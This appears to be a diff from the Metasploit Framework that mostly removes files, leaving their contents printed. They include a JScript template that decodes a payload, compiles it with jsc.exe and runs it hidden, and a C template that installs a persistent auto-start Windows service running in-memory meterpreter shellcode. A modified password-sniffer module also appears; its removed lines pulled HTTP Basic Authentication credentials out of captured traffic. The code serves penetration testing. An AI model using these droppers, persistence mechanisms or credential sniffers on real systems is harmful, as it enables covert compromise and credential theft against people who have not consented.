-        enc1 = this._keyStr.indexOf(input.charAt(i++));
-        enc2 = this._keyStr.indexOf(input.charAt(i++));
-        enc3 = this._keyStr.indexOf(input.charAt(i++));
-        enc4 = this._keyStr.indexOf(input.charAt(i++));
-
-        chr1 = (enc1 << 2) | (enc2 >> 4);
-        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
-        chr3 = ((enc3 & 3) << 6) | enc4;
-
-        output = output + String.fromCharCode(chr1);
-
-        if (enc3 != 64) {
-          output = output + String.fromCharCode(chr2);
-        }
-        if (enc4 != 64) {
-          output = output + String.fromCharCode(chr3);
-        }
-
-      }
-
-      output = Base64._utf8_decode(output);
-
-      return output;
-
-    },
-    _utf8_decode : function (utftext) {
-      var string = "";
-      var input_idx = 0;
-      var chr1 = 0;
-      var chr2 = 0;
-      var chr3 = 0;
-
-      while ( input_idx < utftext.length ) {
-
-        chr1 = utftext.charCodeAt(input_idx);
-
-        if (chr1 < 128) {
-          string += String.fromCharCode(chr1);
-          input_idx++;
-        }
-        else if((chr1 > 191) && (chr1 < 224)) {
-          chr2 = utftext.charCodeAt(input_idx+1);
-          string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
-          input_idx += 2;
-        } else {
-          chr2 = utftext.charCodeAt(input_idx+1);
-          chr3 = utftext.charCodeAt(input_idx+2);
-          string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
-          input_idx += 3;
-        }
-      }
-
-      return string;
-    }
-
-  };
-
-  decodedStr = Base64.decode("<%= jsnet_encoded %>");
-
-  function getTempPath()
-  {
-      var TemporaryFolder = 2;
-
-      var fso = new ActiveXObject("Scripting.FileSystemObject");
-      var tempPath = fso.GetSpecialFolder(TemporaryFolder);
-
-      return tempPath;
-  }
-
-  var path = getTempPath();
-
-  function makefile()
-  {
-      var fso = new ActiveXObject("Scripting.FileSystemObject");
-      var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
-
-      thefile.WriteLine(decodedStr);
-      thefile.Close();
-  }
-
-  makefile();
-
-  function findJSC()
-  {
-    var fso = new ActiveXObject("Scripting.FileSystemObject");
-    var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
-    var jscPath = "";
-
-    if(!fso.FolderExists(comPath))
-    {
-      return false;
-    }
-
-    var frameFolder = fso.GetFolder(comPath);
-    var fEnum = new Enumerator(frameFolder.SubFolders);
-
-    while(!fEnum.atEnd())
-    {
-      jscPath = fEnum.item().Path;
-
-      if(fso.FileExists(jscPath + "\\\\jsc.exe"))
-      {
-        return jscPath + "\\\\jsc.exe";            
-      }
-      
-      fEnum.moveNext();
-    }
-
-    return false;
-  }
-
-  var comPath = findJSC();
-  if(comPath)
-  {
-    var fso = new ActiveXObject("Scripting.FileSystemObject");
-    var objShell = new ActiveXObject("WScript.shell");
-    var js_f = path + "\\\\<%= fname %>.js";
-    var ex = path + "\\\\<%= fname %>.exe";
-    var platform = "/platform:<%= arch %>";
-
-    objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
-    while(!fso.FileExists(ex)) { }
-    
-    objShell.run(ex, 0);
-  }
-</script>

data/exploits/persistence_service/service.erb

@@ -1,304 +0,0 @@
-#include <String.h>
-#include <Windows.h>
-#include <stdlib.h>
-#include <stdio.h>
-
-#define SERVICE_NAME     <%= @service_name.inspect %>
-#define DISPLAY_NAME     <%= @service_description.inspect %>
-#define RETRY_TIME       <%= @retry_time %>
-
-//
-// Globals
-//
-
-SERVICE_STATUS status;
-SERVICE_STATUS_HANDLE hStatus;
-
-//
-// Meterpreter connect back to host
-//
-
-void start_meterpreter()
-{
-// Your meterpreter shell here
-  <%= buf %>
-
-  LPVOID buffer = (LPVOID)VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-  memcpy(buffer,buf,sizeof(buf));
-  HANDLE hThread = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)(buffer),NULL,0,NULL);
-  WaitForSingleObject(hThread, -1); //INFINITE
-  CloseHandle(hThread);
-}
-
-//
-// Call self without parameter to start meterpreter
-//
-
-void self_call()
-{
-    char path[MAX_PATH];
-    char cmd[MAX_PATH];
-
-    if (GetModuleFileName(NULL, path, sizeof(path)) == 0) {
-        // Get module file name failed
-        return;
-    }
-
-    STARTUPINFO startup_info;
-    PROCESS_INFORMATION process_information;
-
-    ZeroMemory(&startup_info, sizeof(startup_info));
-    startup_info.cb = sizeof(startup_info);
-
-    ZeroMemory(&process_information, sizeof(process_information));
-
-    // If create process failed.
-    // CREATE_NO_WINDOW = 0x08000000
-    if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
-                      NULL, &startup_info, &process_information) == 0)
-    {
-        return;
-    }
-
-    // Wait until the process died.
-    WaitForSingleObject(process_information.hProcess, -1);
-}
-
-//
-// Process control requests from the Service Control Manager
-//
-
-VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
-{
-    switch (fdwControl) {
-        case SERVICE_CONTROL_STOP:
-        case SERVICE_CONTROL_SHUTDOWN:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_STOPPED;
-            break;
-
-        case SERVICE_CONTROL_PAUSE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_PAUSED;
-            break;
-
-        case SERVICE_CONTROL_CONTINUE:
-            status.dwWin32ExitCode = 0;
-            status.dwCurrentState = SERVICE_RUNNING;
-            break;
-
-        default:
-            break;
-    }
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    return;
-}
-
-
-//
-// Main function of service
-//
-
-VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
-{
-    // Register the service handler
-
-    hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
-
-    if (hStatus == 0) {
-        //printf("Cannot register service handler (0x%08x)", GetLastError());
-        exit(1);
-    }
-
-    // Initialize the service status structure
-
-    status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
-    status.dwCurrentState = SERVICE_RUNNING;
-    status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-    status.dwWin32ExitCode = 0;
-    status.dwServiceSpecificExitCode = 0;
-    status.dwCheckPoint = 0;
-    status.dwWaitHint = 0;
-
-    if (SetServiceStatus(hStatus, &status) == 0) {
-        //printf("Cannot set service status (0x%08x)", GetLastError());
-        return;
-    }
-
-    // Start the Meterpreter
-    while (status.dwCurrentState == SERVICE_RUNNING) {
-        self_call();
-        Sleep(RETRY_TIME);
-    }
-
-    return;
-}
-
-
-//
-// Installs and starts the Meterpreter service
-//
-
-BOOL install_service()
-{
-    SC_HANDLE hSCManager;
-    SC_HANDLE hService;
-
-    char path[MAX_PATH];
-
-    // Get the current module name
-
-    if (!GetModuleFileName(NULL, path, MAX_PATH)) {
-        //printf("Cannot get module name (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Build the service command line
-
-
-    char cmd[MAX_PATH];
-
-    int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
-    if (total_len < 0 || total_len >= sizeof(cmd)){
-        //printf("Cannot build service command line (0x%08x)", -1);
-        return FALSE;
-    }
-
-    cmd[0] = '\0';
-    strcat(cmd, "\"");
-    strcat(cmd, path);
-    strcat(cmd, "\" <%= @start_cmd %>");
-
-    // Open the service manager
-
-    hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
-
-    if (hSCManager == NULL) {
-        //printf("Cannot open service manager (0x%08x)", GetLastError());
-        return FALSE;
-    }
-
-    // Create the service
-
-    hService = CreateService(
-        hSCManager,
-        SERVICE_NAME,
-        DISPLAY_NAME,
-        0xf01ff,            // SERVICE_ALL_ACCESS
-        SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
-        SERVICE_AUTO_START,
-        SERVICE_ERROR_NORMAL,
-        cmd,
-        NULL,
-        NULL,
-        NULL,
-        NULL,   /* LocalSystem account */
-        NULL
-    );
-
-    if (hService == NULL) {
-        //printf("Cannot create service (0x%08x)", GetLastError());
-
-        CloseServiceHandle(hSCManager);
-        return FALSE;
-    }
-
-    // Start the service
-
-    char* args[] = { path, "service" };
-
-    if (StartService(hService, 2, (const char**)&args) == 0) {
-        DWORD err = GetLastError();
-
-        if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
-        {
-            //printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
-
-            CloseServiceHandle(hService);
-            CloseServiceHandle(hSCManager);
-            return FALSE;
-        }
-    }
-
-    // Cleanup
-
-    CloseServiceHandle(hService);
-    CloseServiceHandle(hSCManager);
-
-    //printf("Service %s successfully installed.", SERVICE_NAME);
-
-    return TRUE;
-}
-
-//
-// Start the service
-//
-
-void start_service()
-{
-    SERVICE_TABLE_ENTRY ServiceTable[] =
-    {
-        { SERVICE_NAME, &ServiceMain },
-        { NULL, NULL }
-    };
-
-    if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
-        //printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
-        exit(1);
-    }
-}
-
-
-//
-// Main function
-//
-
-int main()
-{
-    // Parse the command line argument.
-    // For now, int main(int argc, char *argv) is buggy with metasm.
-    // So we choose this approach to achieve it.
-    LPTSTR cmdline;
-    cmdline = GetCommandLine();
-
-    char *argv[MAX_PATH];
-    char * ch = strtok(cmdline," ");
-    int argc = 0;
-
-    while (ch != NULL)
-    {
-       argv[argc] = malloc( strlen(ch)+1) ;
-       strncpy(argv[argc], ch, strlen(ch)+1);
-
-       ch = strtok (NULL, " ");
-       argc++;
-    }
-
-    if (argc > 1) {
-
-        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
-
-            // Installs and starts the service
-
-            install_service();
-            return 0;
-        }
-        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
-            // Starts the Meterpreter as a service
-
-            start_service();
-            return 0;
-        }
-    }
-
-    // Starts the Meterpreter as a normal application
-
-    start_meterpreter();
-
-    return 0;
-}

data/exploits/psnuffle/url.rb

@@ -1,24 +1,22 @@
-# Psnuffle password sniffer add-on class for HTTP URLs
+# Psnuffle password sniffer add-on class for HTTP GET URL's
 # part of psnuffle sniffer auxiliary module
+#
+# Very simple example how to write sniffer extensions
+#
 
-#
-# Sniffer class for GET/POST URLs.
-# Also extracts HTTP Basic authentication credentials.
-#
+# Sniffer class for GET URL's
 class SnifferURL < BaseProtocolParser
   def register_sigs
     self.sigs = {
-      :get        => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
-      :post       => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,
-      :webhost	  => /^HOST:\s+([^\n\r]+)/i,
-      :basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,
+      :get		=> /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
+      :webhost	=> /^HOST\:\s+([^\n\r]+)/i,
     }
   end
 
   def parse(pkt)
-    # We want to return immediately if we do not have a packet which is handled by us
+    # We want to return immediantly if	we do not have a packet which is handled by us
     return unless pkt.is_tcp?
-    return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)
+    return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
     s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
 
     self.sigs.each_key do |k|
@@ -36,16 +34,10 @@ class SnifferURL < BaseProtocolParser
       case matched
       when :webhost
         sessions[s[:session]].merge!({k => matches})
-        if s[:get]
+        if(s[:get])
           print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
-        end
-        if s[:post]
-          print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")
-        end
-        if s[:basic_auth]
-          s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
-          report_auth_info s
-          print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
+          sessions.delete(s[:session])
+          return
         end
       when nil
         # No matches, no saved state
@@ -53,3 +45,4 @@ class SnifferURL < BaseProtocolParser
     end # end of each_key
   end # end of parse
 end # end of URL sniffer
+

data/headers/windows/String.h

@@ -1,27 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-void *memchr(const void*, int, size_t);
-int memcmp(const void*, const void*, size_t);
-void *memcpy(void*, const void*, size_t);
-void *memmove(void*, const void*, size_t);
-void *memset(void*, int, size_t);
-char *strcat(char*, const char*);
-char *strncat(char*, const char*, size_t);
-char *strchr(const char*, int);
-int strcmp(const char*, const char*);
-int strncmp(const char*, const char*, size_t);
-int strcoll(const char*, const char*);
-char *strcpy(char*, const char*);
-char *strncpy(char*, const char*, size_t);
-size_t strcspn(const char*, const char*);
-char *strerror(int);
-size_t strlen(const char*);
-char *strpbrk(const char*, const char*);
-char *strrchr(const char*, int);
-size_t strspn(const char*, const char*);
-char *strstr(const char*, const char*);
-char *strtok(char*, const char*);
-size_t strxfrm(char*, const char*, size_t);

data/headers/windows/Windows.h

@@ -1,555 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-#define MAX_PATH 260
-#define MEM_COMMIT 0x00001000
-#define MEM_RESERVE 0x00002000
-#define MEM_RESET 0x00080000
-#define MEM_RESET_UNDO 0x1000000
-#define MEM_LARGE_PAGES 0x20000000
-#define MEM_PHYSICAL 0x00400000
-#define MEM_TOP_DOWN 0x00100000
-#define MEM_WRITE_WATCH 0x00200000
-#define PAGE_EXECUTE_READWRITE 0x00000040
-#define HEAP_GENERATE_EXCEPTIONS 0x00000004
-#define HEAP_NO_SERIALIZE 0x00000001
-#define HEAP_REALLOC_IN_PLACE_ONLY 0x00000010
-#define HEAP_ZERO_MEMORY 0x00000008
-#define STARTF_FORCEONFEEDBACK 0x00000040
-#define STARTF_FORCEOFFFEEDBACK 0x00000080
-#define STARTF_PREVENTPINNING 0x00002000
-#define STARTF_RUNFULLSCREEN 0x00000020
-#define STARTF_TITLEISAPPID 0x00001000
-#define STARTF_TITLEISLINKNAME 0x00000800
-#define STARTF_USECOUNTCHARS 0x00000008
-#define STARTF_USEFILLATTRIBUTE 0x00000010
-#define STARTF_USEHOTKEY 0x00000200
-#define STARTF_USEPOSITION 0x00000004
-#define STARTF_USESHOWWINDOW 0x00000001
-#define STARTF_USESIZE 0x00000002
-#define STARTF_USESTDHANDLES 0x00000100
-#define GW_CHILD 5
-#define GW_ENABLEDPOPUP 6
-#define GW_HWNDFIRST 0
-#define GW_HWNDLAST 1
-#define GW_HWNDNEXT 2
-#define GW_OWNER 4
-#define MB_ABORTRETRYIGNORE 0x00000002L
-#define MB_CANCELTRYCONTINUE 0x00000006L
-#define MB_HELP 0x00004000L
-#define MB_OK 0x00000000L
-#define MB_OKCANCEL 0x00000001L
-#define MB_RETRYCANCEL 0x00000005L
-#define MB_YESNO 0x00000004L
-#define MB_YESNOCANCEL 0x00000003L
-#define MB_ICONEXCLAMATION 0x00000030L
-#define MB_ICONWARNING 0x00000030L
-#define MB_ICONINFORMATION 0x00000040L
-#define MB_ICONASTERISK 0x00000040L
-#define MB_ICONQUESTION 0x00000020L
-#define MB_ICONSTOP 0x00000010L
-#define MB_ICONERROR 0x00000010L
-#define MB_ICONHAND 0x00000010L
-#define MB_DEFBUTTON1 0x00000000L
-#define MB_DEFBUTTON2 0x00000100L
-#define MB_DEFBUTTON3 0x00000200L
-#define MB_DEFBUTTON4 0x00000300L
-#define MB_APPLMODAL 0x00000000L
-#define MB_SYSTEMMODAL 0x00001000L
-#define MB_TASKMODAL 0x00002000L
-#define MB_DEFAULT_DESKTOP_ONLY 0x00020000L
-#define MB_RIGHT 0x00080000L
-#define MB_RTLREADING 0x00100000L
-#define MB_SETFOREGROUND 0x00010000L
-#define MB_TOPMOST 0x00040000L
-#define MB_SERVICE_NOTIFICATION 0x00200000L
-#define IDABORT 3
-#define IDCANCEL 2
-#define IDCONTINUE 11
-#define IDIGNORE 5
-#define IDNO 7
-#define IDOK 1
-#define IDRETRY 4
-#define IDTRYAGAIN 10
-#define IDYES 6
-#define HEAP_CREATE_ENABLE_EXECUTE 0x00040000
-#define SC_MANAGER_ALL_ACCESS 0xf003f
-#define SC_MANAGER_CONNECT 1
-#define SC_MANAGER_CREATE_SERVICE 2
-#define SC_MANAGER_ENUMERATE_SERVICE 4
-#define SC_MANAGER_LOCK 8
-#define SC_MANAGER_QUERY_LOCK_STATUS 16
-#define SC_MANAGER_MODIFY_BOOT_CONFIG 32
-#define SERVICE_NO_CHANGE (-1)
-#define SERVICE_STOPPED 1
-#define SERVICE_START_PENDING 2
-#define SERVICE_STOP_PENDING  3
-#define SERVICE_RUNNING 4
-#define SERVICE_CONTINUE_PENDING  5
-#define SERVICE_PAUSE_PENDING 6
-#define SERVICE_PAUSED  7
-#define SERVICE_ACCEPT_STOP 1
-#define SERVICE_ACCEPT_PAUSE_CONTINUE 2
-#define SERVICE_ACCEPT_SHUTDOWN 4
-#define SERVICE_CONTROL_STOP  1
-#define SERVICE_CONTROL_PAUSE 2
-#define SERVICE_CONTROL_CONTINUE  3
-#define SERVICE_CONTROL_INTERROGATE 4
-#define SERVICE_CONTROL_SHUTDOWN  5
-#define SERVICE_ACTIVE 1
-#define SERVICE_INACTIVE 2
-#define SERVICE_STATE_ALL 3
-#define SERVICE_QUERY_CONFIG 1
-#define SERVICE_CHANGE_CONFIG 2
-#define SERVICE_QUERY_STATUS 4
-#define SERVICE_ENUMERATE_DEPENDENTS 8
-#define SERVICE_START 16
-#define SERVICE_STOP 32
-#define SERVICE_PAUSE_CONTINUE 64
-#define SERVICE_INTERROGATE 128
-#define SERVICE_USER_DEFINED_CONTROL 256
-#define SERVICE_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED|SERVICE_QUERY_CONFIG|SERVICE_CHANGE_CONFIG|SERVICE_QUERY_STATUS|SERVICE_ENUMERATE_DEPENDENTS|SERVICE_START|SERVICE_STOP|SERVICE_PAUSE_CONTINUE|SERVICE_INTERROGATE|SERVICE_USER_DEFINED_CONTROL)
-#define GHND 0x0042
-#define GMEM_FIXED 0x0000
-#define GMEM_MOVEABLE 0x0002
-#define GMEM_ZEROINIT 0x0040
-#define GPTR 0x0040
-#define WH_CALLWNDPROC 4
-#define WH_CALLWNDPROCRET 12
-#define WH_CBT 5
-#define WH_DEBUG 9
-#define WH_FOREGROUNDIDLE 11
-#define WH_GETMESSAGE 3
-#define WH_JOURNALPLAYBACK 1
-#define WH_JOURNALRECORD 0
-#define WH_KEYBOARD 2
-#define WH_KEYBOARD_LL 13
-#define WH_MOUSE 7
-#define WH_MOUSE_LL 14
-#define WH_MSGFILTER -1
-#define WH_SHELL 10
-#define WH_SYSMSGFILTER 6
-#define GENERIC_READ 0x80000000
-#define GENERIC_WRITE 0x40000000
-#define GENERIC_EXECUTE 0x20000000
-#define GENERIC_ALL 0x10000000
-#define FILE_SHARE_READ 0x00000001
-#define FILE_SHARE_WRITE 0x00000002
-#define FILE_SHARE_DELETE 0x00000004
-#define CREATE_NEW 1
-#define CREATE_ALWAYS 2
-#define OPEN_EXISTING 3
-#define OPEN_ALWAYS 4
-#define TRUNCATE_EXISTING 5
-#define FILE_ATTRIBUTE_READONLY 0x00000001
-#define FILE_ATTRIBUTE_NORMAL 0x00000080
-#define FILE_ATTRIBUTE_TEMPORARY 0x00000100
-#define FILE_FLAG_WRITE_THROUGH 0x80000000
-#define FILE_FLAG_NO_BUFFERING 0x20000000
-#define FILE_FLAG_RANDOM_ACCESS 0x10000000
-#define FILE_FLAG_SEQUENTIAL_SCAN 0x08000000
-#define FILE_FLAG_DELETE_ON_CLOSE 0x04000000
-#define FILE_FLAG_OVERLAPPED 0x40000000
-#define FILE_ATTRIBUTE_HIDDEN 0x00000002
-#define FILE_ATTRIBUTE_SYSTEM 0x00000004
-#define FILE_ATTRIBUTE_DIRECTORY 0x00000010
-#define FILE_ATTRIBUTE_ARCHIVE 0x00000020
-#define FILE_ATTRIBUTE_DEVICE 0x00000040
-#define ERROR_FILE_NOT_FOUND 2L
-#define ERROR_NO_MORE_FILES 18L
-#define INVALID_HANDLE_VALUE ((HANDLE) -1)
-#define INVALID_FILE_SIZE ((DWORD)0xFFFFFFFF)
-#define FILE_NAME_NORMALIZED 0x0
-#define FILE_NAME_OPENED 0x8
-#define VOLUME_NAME_DOS 0x0
-#define VOLUME_NAME_GUID 0x1
-#define VOLUME_NAME_NONE 0x4
-#define VOLUME_NAME_NT 0x2
-#define SERVICE_FILE_SYSTEM_DRIVER 0x00000002
-#define SERVICE_KERNEL_DRIVER 0x00000001
-#define SERVICE_WIN32_OWN_PROCESS 0x00000010
-#define SERVICE_WIN32_SHARE_PROCESS 0x00000020
-#define SERVICE_USER_OWN_PROCESS 0x00000050
-#define SERVICE_USER_SHARE_PROCESS 0x00000060
-#define SERVICE_INTERACTIVE_PROCESS 0x00000100
-#define SERVICE_CONTINUE_PENDING 0x00000005
-#define SERVICE_PAUSE_PENDING 0x00000006
-#define SERVICE_PAUSED 0x00000007
-#define SERVICE_RUNNING 0x00000004
-#define SERVICE_START_PENDING 0x00000002
-#define SERVICE_STOP_PENDING 0x00000003
-#define SERVICE_STOPPED 0x00000001
-#define SERVICE_AUTO_START 0x00000002
-#define SERVICE_BOOT_START 0x00000000
-#define SERVICE_DEMAND_START 0x00000003
-#define SERVICE_DISABLED 0x00000004
-#define SERVICE_SYSTEM_START 0x00000001
-#define SERVICE_ERROR_CRITICAL 0x00000003
-#define SERVICE_ERROR_IGNORE 0x00000000
-#define SERVICE_ERROR_NORMAL 0x00000001
-#define SERVICE_ERROR_SEVERE 0x00000002
-#define SERVICE_DRIVER 0x0000000B
-#define SERVICE_FILE_SYSTEM_DRIVER 0x00000002
-#define SERVICE_KERNEL_DRIVER 0x00000001
-#define SERVICE_WIN32 0x00000030
-#define SERVICE_WIN32_OWN_PROCESS 0x00000010
-#define SERVICE_WIN32_SHARE_PROCESS 0x00000020
-#define MAKEWORD(a,b) ((WORD)(((BYTE)(a))|(((WORD)((BYTE)(b)))<<8)))
-#define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length))
-#define ZeroMemory RtlZeroMemory
-
-typedef struct _SECURITY_ATTRIBUTES {
-  DWORD nLength;
-  LPVOID lpSecurityDescriptor;
-  BOOL bInheritHandle;
-} SECURITY_ATTRIBUTES , *LPSECURITY_ATTRIBUTES;
-
-typedef struct _LPTHREAD_START_ROUTINE {
-  LPVOID lpThreadParameter;
-} LPTHREAD_START_ROUTINE, *LPTHREAD_START_ROUTINE;
-
-typedef struct _STARTUPINFO {
-  DWORD  cb;
-  LPTSTR lpReserved;
-  LPTSTR lpDesktop;
-  LPTSTR lpTitle;
-  DWORD  dwX;
-  DWORD  dwY;
-  DWORD  dwXSize;
-  DWORD  dwYSize;
-  DWORD  dwXCountChars;
-  DWORD  dwYCountChars;
-  DWORD  dwFillAttribute;
-  DWORD  dwFlags;
-  WORD   wShowWindow;
-  WORD   cbReserved2;
-  LPBYTE lpReserved2;
-  HANDLE hStdInput;
-  HANDLE hStdOutput;
-  HANDLE hStdError;
-} STARTUPINFO, *LPSTARTUPINFO;
-
-typedef struct _PROCESS_INFORMATION {
-  HANDLE hProcess;
-  HANDLE hThread;
-  DWORD  dwProcessId;
-  DWORD  dwThreadId;
-} PROCESS_INFORMATION, *LPPROCESS_INFORMATION;
-
-typedef struct _OVERLAPPED {
-  ULONG_PTR Internal;
-  ULONG_PTR InternalHigh;
-  union {
-    struct {
-      DWORD Offset;
-      DWORD OffsetHigh;
-    };
-    PVOID  Pointer;
-  };
-  HANDLE    hEvent;
-} OVERLAPPED, *LPOVERLAPPED;
-
-typedef DWORD SERVICE_STATUS_HANDLE;
-typedef VOID(WINAPI *LPHANDLER_FUNCTION)(DWORD);
-
-typedef void (WINAPI *LPSERVICE_MAIN_FUNCTION)(DWORD,LPSTR*);
-
-typedef struct _SERVICE_TABLE_ENTRY {
-	LPSTR lpServiceName;
-	LPSERVICE_MAIN_FUNCTION lpServiceProc;
-} SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
-
-typedef SERVICE_TABLE_ENTRY SERVICE_TABLE_ENTRY,*LPSERVICE_TABLE_ENTRY;
-
-typedef enum _SC_ENUM_TYPE {
-        SC_ENUM_PROCESS_INFO = 0
-} SC_ENUM_TYPE;
-
-typedef enum _HEAP_INFORMATION_CLASS {
-  HeapCompatibilityInformation = 0,
-  HeapEnableTerminationOnCorruption = 1
-} HEAP_INFORMATION_CLASS;
-
-typedef struct _FILETIME {
-  DWORD dwLowDateTime;
-  DWORD dwHighDateTime;
-} FILETIME, *PFILETIME;
-
-typedef struct _WIN32_FIND_DATA {
-  DWORD    dwFileAttributes;
-  FILETIME ftCreationTime;
-  FILETIME ftLastAccessTime;
-  FILETIME ftLastWriteTime;
-  DWORD    nFileSizeHigh;
-  DWORD    nFileSizeLow;
-  DWORD    dwReserved0;
-  DWORD    dwReserved1;
-  TCHAR    cFileName[MAX_PATH];
-  TCHAR    cAlternateFileName[14];
-} WIN32_FIND_DATA, *PWIN32_FIND_DATA, *LPWIN32_FIND_DATA;
-
-typedef struct tagPOINT {
-  LONG x;
-  LONG y;
-} POINT, *PPOINT;
-
-typedef struct tagMSG {
-  HWND   hwnd;
-  UINT   message;
-  WPARAM wParam;
-  LPARAM lParam;
-  DWORD  time;
-  POINT  pt;
-} MSG, *PMSG, *LPMSG;
-
-typedef struct _BY_HANDLE_FILE_INFORMATION {
-  DWORD    dwFileAttributes;
-  FILETIME ftCreationTime;
-  FILETIME ftLastAccessTime;
-  FILETIME ftLastWriteTime;
-  DWORD    dwVolumeSerialNumber;
-  DWORD    nFileSizeHigh;
-  DWORD    nFileSizeLow;
-  DWORD    nNumberOfLinks;
-  DWORD    nFileIndexHigh;
-  DWORD    nFileIndexLow;
-} BY_HANDLE_FILE_INFORMATION, *PBY_HANDLE_FILE_INFORMATION, *LPBY_HANDLE_FILE_INFORMATION;
-
-typedef struct _SERVICE_STATUS {
-  DWORD dwServiceType;
-  DWORD dwCurrentState;
-  DWORD dwControlsAccepted;
-  DWORD dwWin32ExitCode;
-  DWORD dwServiceSpecificExitCode;
-  DWORD dwCheckPoint;
-  DWORD dwWaitHint;
-} SERVICE_STATUS, *LPSERVICE_STATUS;
-
-typedef struct _ENUM_SERVICE_STATUS {
-  LPTSTR         lpServiceName;
-  LPTSTR         lpDisplayName;
-  SERVICE_STATUS ServiceStatus;
-} ENUM_SERVICE_STATUS, *LPENUM_SERVICE_STATUS;
-
-typedef struct _GUID {
-  DWORD Data1;
-  WORD  Data2;
-  WORD  Data3;
-  BYTE  Data4[8];
-} GUID;
-
-typedef VOID (CALLBACK *LPOVERLAPPED_COMPLETION_ROUTINE)(DWORD,DWORD,LPOVERLAPPED);
-
-typedef enum _PROCESSINFOCLASS {
-    ProcessBasicInformation                      = 0,
-    ProcessQuotaLimits                           = 1,
-    ProcessIoCounters                            = 2,
-    ProcessVmCounters                            = 3,
-    ProcessTimes                                 = 4,
-    ProcessBasePriority                          = 5,
-    ProcessRaisePriority                         = 6,
-    ProcessDebugPort                             = 7,
-    ProcessExceptionPort                         = 8,
-    ProcessAccessToken                           = 9,
-    ProcessLdtInformation                        = 10,
-    ProcessLdtSize                               = 11,
-    ProcessDefaultHardErrorMode                  = 12,
-    ProcessIoPortHandlers                        = 13,
-    ProcessPooledUsageAndLimits                  = 14,
-    ProcessWorkingSetWatch                       = 15,
-    ProcessUserModeIOPL                          = 16,
-    ProcessEnableAlignmentFaultFixup             = 17,
-    ProcessPriorityClass                         = 18,
-    ProcessWx86Information                       = 19,
-    ProcessHandleCount                           = 20,
-    ProcessAffinityMask                          = 21,
-    ProcessPriorityBoost                         = 22,
-    ProcessDeviceMap                             = 23,
-    ProcessSessionInformation                    = 24,
-    ProcessForegroundInformation                 = 25,
-    ProcessWow64Information                      = 26,
-    ProcessImageFileName                         = 27,
-    ProcessLUIDDeviceMapsEnabled                 = 28,
-    ProcessBreakOnTermination                    = 29,
-    ProcessDebugObjectHandle                     = 30,
-    ProcessDebugFlags                            = 31,
-    ProcessHandleTracing                         = 32,
-    ProcessIoPriority                            = 33,
-    ProcessExecuteFlags                          = 34,
-    ProcessTlsInformation                        = 35,
-    ProcessCookie                                = 36,
-    ProcessImageInformation                      = 37,
-    ProcessCycleTime                             = 38,
-    ProcessPagePriority                          = 39,
-    ProcessInstrumentationCallback               = 40,
-    ProcessThreadStackAllocation                 = 41,
-    ProcessWorkingSetWatchEx                     = 42,
-    ProcessImageFileNameWin32                    = 43,
-    ProcessImageFileMapping                      = 44,
-    ProcessAffinityUpdateMode                    = 45,
-    ProcessMemoryAllocationMode                  = 46,
-    ProcessGroupInformation                      = 47,
-    ProcessTokenVirtualizationEnabled            = 48,
-    ProcessOwnerInformation                      = 49,
-    ProcessWindowInformation                     = 50,
-    ProcessHandleInformation                     = 51,
-    ProcessMitigationPolicy                      = 52,
-    ProcessDynamicFunctionTableInformation       = 53,
-    ProcessHandleCheckingMode                    = 54,
-    ProcessKeepAliveCount                        = 55,
-    ProcessRevokeFileHandles                     = 56,
-    ProcessWorkingSetControl                     = 57,
-    ProcessHandleTable                           = 58,
-    ProcessCheckStackExtentsMode                 = 59,
-    ProcessCommandLineInformation                = 60,
-    ProcessProtectionInformation                 = 61,
-    ProcessMemoryExhaustion                      = 62,
-    ProcessFaultInformation                      = 63,
